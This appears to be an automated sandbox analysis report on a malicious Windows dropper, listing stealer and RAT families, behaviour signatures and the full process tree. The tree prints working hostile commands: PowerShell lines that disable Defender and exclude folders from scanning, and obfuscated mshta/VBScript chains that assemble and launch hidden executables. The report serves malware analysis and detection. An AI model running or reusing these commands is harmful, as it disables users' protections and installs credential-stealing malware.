Analysis Overview
SHA256
54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c
Threat Level: Known bad
The file 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe was found to be: Known bad.
Malicious Activity Summary
Gcleaner family
RedLine payload
PrivateLoader
OnlyLogger
Onlylogger family
SectopRAT
Socelars family
Sectoprat family
Socelars
NullMixer
Socelars payload
GCleaner
Nullmixer family
RedLine
SectopRAT payload
Fabookie family
Redline family
Privateloader family
Fabookie
Detect Fabookie payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
ASPack v2.12-2.42
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Looks up geolocation information via web service
Drops Chrome extension
Blocklisted process makes network request
Suspicious use of SetThreadContext
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-22 07:31
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win10v2004-20241007-en
Max time kernel
86s
Max time network
120s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 776 set thread context of 4896 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe |
| PID 5048 set thread context of 3520 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe |
| PID 3936 set thread context of 312 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343342817050" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe
Thu125e541847539.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 4708
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp" /SL5="$40240,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 616
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp" /SL5="$B01D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2564 -ip 2564
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 360
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd30c8cc40,0x7ffd30c8cc4c,0x7ffd30c8cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
